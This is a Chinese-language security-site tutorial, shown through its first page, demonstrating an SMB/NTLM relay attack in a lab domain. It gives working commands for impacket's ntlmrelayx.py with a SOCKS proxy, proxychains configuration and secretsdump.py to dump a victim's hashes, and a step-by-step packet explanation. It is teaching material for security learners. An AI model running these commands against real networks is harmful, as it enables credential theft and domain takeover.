欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Windows SMB请求重放攻击分析

来源:本站整理 作者:R1ngk3y 时间:2018-07-10 TAG: 我要投稿

前言
smb中继或叫smb请求重放攻击,B是一个smb服务器,A来进行认证,B将A的认证信息转发到C上,如果A的凭证在C上认证成功就能进行下一步操作,如创建服务执行命令。如果在域中控制了某些常用服务,如:WEB OA系统、文件共享等服务则可以尝试使用SMB中继攻击来引诱域管理员访问达到获取其他机器权限的目的。

环境
192.168.123.10 win 7  域管理员(administrator)机器
192.168.123.11 kali linux 攻击者机器
192.168.123.100 域内普通用户-受害者机器
攻击演示
需要smb签名关闭下才能进行利用,只有windows server的smb签名是默认开启的,像Windows 7的签名默认关闭
可以用nmap探测smb是否关闭
nmap --script smb-security-mode.nse -p445 192.168.123.0/24 --open

下载impacket工具包
git clone https://github.com/CoreSecurity/impacket.git
192.168.123.11(攻击者机器) 执行
ntlmrelayx.py -tf hosts.txt -socks -smb2support
hosts.txt里面的内容是要进行中继的IP,机器越多成功率越高,我这里只有一个IP

然后让192.168.123.10(域管理员机器) 访问192.168.123.11(攻击者机器)的共享,可以架设一个web服务器,html页面里嵌入\\攻击者地址,我这里为了方便演示就在本地写一个html

192.168.123.10(域管理员机器)访问共享时,提示如下说明中继成功

[*] Authenticating against smb://192.168.123.100 as Z3R0\Administrator SUCCEED [*] SOCKS: Adding Z3R0/ADMINISTRATOR@192.168.123.100(445) to active SOCKS connection. Enjoy
然后在本地会创建一个socks4代理
在 /etc/proxychains.conf 的最后一行填入
socks4  192.168.123.11 1080
配置好socks4代理后攻击者执行
proxychains python secretsdump.py z3r0/Administrator@192.168.123.100
这样secretsdump.py发送出的认证数据包经过socks4代理中继就能成功进行认证

如果不加上其他参数的话ntlmrelayx.py默认会dumphash

先看看视频效果图
上传时 freebuf提示图片超出大小限制(希望小编能处理下:) ),效果图地址:/Article/UploadPic/2018-7/2018710164730287.gif
原理分析
每一步smb请求都被192.168.123.11(攻击者机器)转发到了其他机器上

1. 192.168.123.10(域管理员机器)向192.168.123.11(攻击者机器)商量smb协议版本

2. 192.168.123.11(攻击者机器)向192.168.123.100(受害者机器)商量smb协议版本
3.192.168.123.100(受害者机器)向192.168.123.11(攻击者机器)回答支持smb v2

4.192.168.123.11(攻击者机器)向192.168.123.10(域管理员机器)回答支持smb v2
协商完就开始认证了

1.192.168.123.10(域管理员机器)向192.168.123.11(攻击者机器)发出NTLMSSP_NEGOTIATE认证协商请求
2.192.168.123.11(攻击者机器)向192.168.123.100(受害者机器)发出NTLMSSP_NEGOTIATE认证协商请求
3.192.168.123.100(受害者机器)向192.168.123.11(攻击者机器)进行响应,响应包里含有challenge

4.同样192.168.123.11(攻击者机器)向192.168.123.10(域管理员机器)进行响应,响应包里含有challenge

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载